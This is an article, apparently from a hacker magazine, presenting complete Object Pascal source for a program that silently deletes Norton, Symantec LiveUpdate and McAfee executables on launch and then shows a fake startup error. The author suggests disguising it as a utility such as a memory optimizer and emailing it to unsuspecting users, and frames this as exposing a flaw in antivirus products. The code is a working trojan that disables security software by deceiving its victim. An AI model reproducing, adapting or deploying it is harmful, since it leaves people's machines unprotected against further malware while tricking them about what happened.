A Simple but Effective Spanner in Your AVS

by Irving Washington

First off, sorry if anyone's miffed that I wrote this in Object Pascal.

I happen to like Borland's IDEs, and Delphi 7 (Download) came free with a computer mag DVD.  I actually like it when the aim is to produce a Win32 app which can easily take the look and feel of all the Win OSes, from the battleship gray of Windows 95 to the Fisher-Price makeover of Windows XP.  So there.  I'm sure you all will take about ten seconds to appreciate the concept and can then write something similar in your own languages.

The basic concept is this:

On execution, the program looks for various EXE files in their standard installation places on the PC running the program.  If they exist, the program deletes them.  For example:

if fileExists ('C:\AVS\AVS.EXE') then
   deleteFile ('C:\AVS\AVS.EXE')
endif.

(Repeat for each file you want to delete)

And that, as they say, is that.

It's easy to get lists of EXE files and their default install locations without shelling out for all the packages.  I got mine by downloading demo versions.  I expect there's an easier way to read the tree for each Anti-Virus Software (AVS) package, but I wanted to get something going quickly to see if the AVS software would pick it up.  It doesn't, as far as I can tell.

Therefore, this could be sent via e-mail systems which check for virii and the like.  The trusting user, seeing the app pass the online scan, would then download and run it on their own system.  The effect is to leave the "shell" of the AVS on the machine, while removing all the working parts.  Kind of like stealing a PC from the inside, leaving the empty case behind.

The deleted files cannot be recovered by going to our old friend the "Recycle Bin".  To the typical user, they will be irretrievable, and the AVS will require a re-installation.

This is obviously not good.  I don't like the idea that I could pay for an AVS designed to protect my PC that could be knocked out by a program which any novice with a bare modicum of programming skills could write, plus the fact that if the person who sent the file was targeting a specific PC/group of PCs, they would be vulnerable to all virii etc., once the initial AVS "de-EXE-r" had been run.

I know that this program isn't a virus.  It's a program that does what it's supposed to.  But it seems hopelessly lame to me that AVS programs aren't able to protect themselves against such a blatant, obvious attack.

My program, once it has removed the AVS EXE files, displays a little message box saying how the program is incompatible with that version of Windows.  The AVS de-EXE-r can obviously be called, and touted as, anything else.  A useful memory optimizer, for example.  It then shows a window with all the standard menu bar items (disabled) and an error message.  It has an option for reading the detail s of the "fault."  All cosmetic doohickeys that serve to trick the user into believing that this was simply a program that failed to work, like so many free downloads.

I guess now maybe it's the turn of the guys who get paid to make these AVS things to sort this out.

This took me approximately five minutes to write.  Because I believe in responsible hacking, the only PC I've used it on is my own.  Naturally (here it comes), "What you do with the information contained in this article is up to you.  You know the laws in your own countries, etc.  You know the score.  endpreach()."

Sorry, but I always find those bits quite fun.

O.K., that's enough.  The bones of the program are below.  If you want to use Delphi, I believe you can get free versions at www.borland.com.  If you want to try out my app (on your own PCs only!) then email me.

AVS-de-EXE-r.pas:

//main listing for AVS-De-exe-r as whatnotted in Object Pascal using Delphi 7 

unit Main;
interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, Menus;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Label1: TLabel;
    ListBox1: TListBox;
    MainMenu1: TMainMenu;
    File1: TMenuItem;
    Register1: TMenuItem;
    Search1: TMenuItem;
    View1: TMenuItem;
    ools1: TMenuItem;
    Window1: TMenuItem;
    Help1: TMenuItem;
    Memo1: TMemo;
    Button2: TButton;
    procedure FormCreate(Sender: TObject);
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\BackLog.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\BackLog.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\BootWarn.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\BootWarn.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\DefAlert.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\DefAlert.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\n32scanw.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\n32scanw.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\navapsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navapsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\navapw32.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navapw32.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
   if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
   if fileExists ('C:\Program Files\Navnt\navapw32.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navapw32.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\NavUStub.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\NavUStub.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\navwnt.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navwnt.exe');
    end;
   if fileExists ('C:\Program Files\Navnt\NPSCheck.EXE') then
    begin
      deleteFile ('C:\Program Files\Navnt\NPSCheck.EXE');
    end;
    if fileExists ('C:\Program Files\Navnt\npssvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\npssvc.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\NSPlugin.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\NSPlugin.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\NTaskMgr.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\NTaskMgr.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\nvlaunch.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\nvlaunch.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\POProxy.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\POProxy.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\qconsole.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\qconsole.exe');
    end;
       if fileExists ('C:\Program Files\Navnt\ScnHndlr.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\ScnHndlr.exe');
    end;
      if fileExists ('C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\AUPDATE.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\AUPDATE.EXE');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\LUALL.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\LUALL.EXE');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\LuComServer.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\LuComServer.EXE');
    end;
    if fileExists ('C:\Program Files\Symantec\LiveUpdate\1.Settings.Default.LiveUpdate') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\1.Settings.Default.LiveUpdate');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\LSETUP.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\LSETUP.EXE');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\gd32.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\gd32.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\gdlaunch.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\gdlaunch.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\gdcrypt.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\gdcrypt.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\GuardDog.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\GuardDog.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\IView.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\IView.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Firewall\cpd.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Firewall\cpd.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\VisualTrace\NeoTrace.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\VisualTrace\NeoTrace.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Shredder\shred32.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Shredder\shred32.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\QuickClean Lite\QClean.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\QuickClean Lite\QClean.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\CMGrdian.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\CMGrdian.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\schedwiz.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\schedwiz.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Central\CLaunch.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Central\CLaunch.exe');
    end;
  showmessage('Could not find dev\null\drivers.dll. Application failed to start.');

end;

procedure TForm1.Button1Click(Sender: TObject);
begin
  Close;
end;

procedure TForm1.Button2Click(Sender: TObject);
begin
  ListBox1.Visible := false;
  Memo1.Visible := true;
end;

end.

Code: AVS-de-EXE-r.pas

Return to $2600 Index